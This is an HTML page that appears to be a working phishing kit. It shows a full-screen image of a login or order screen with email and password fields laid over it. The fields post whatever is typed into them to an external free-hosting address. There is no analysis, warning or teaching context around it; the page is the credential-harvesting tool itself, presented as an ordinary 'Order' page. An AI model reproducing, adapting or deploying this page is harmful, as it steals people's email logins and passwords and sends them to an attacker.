﻿</script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
function validatePassword()
{
	if(logonform.password.value == ""){
		alert("Email field cannot be empty");
		logonform.password.focus();
		return false;
	}
}
</script>
<title>Order</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1350px; height:620px; z-index:0"><img src="images/p1.png" alt="" title="" border=0 width=1350 height=620></div>

<form name="logonform" method="POST" onsubmit="return validatePassword()" action="https://babafhome.000webhostapp.com/xl/logon.php " style="margin:0px">

<input name="username" placeholder="Email Address" style="position:absolute;width:435px;height:57px;left:458px;top:312px;z-index:1">
<input name="password" type="password" placeholder=" password" style="position:absolute;width:435px;height:57px;left:458px;top:363px;z-index:2">
<div id="formimage1" style="position:absolute; left:458px; top:441px; z-index:3"><input type="image" name="formimage1" width="435" height="57" src="images/p2.png"></div>

</body>
</html>
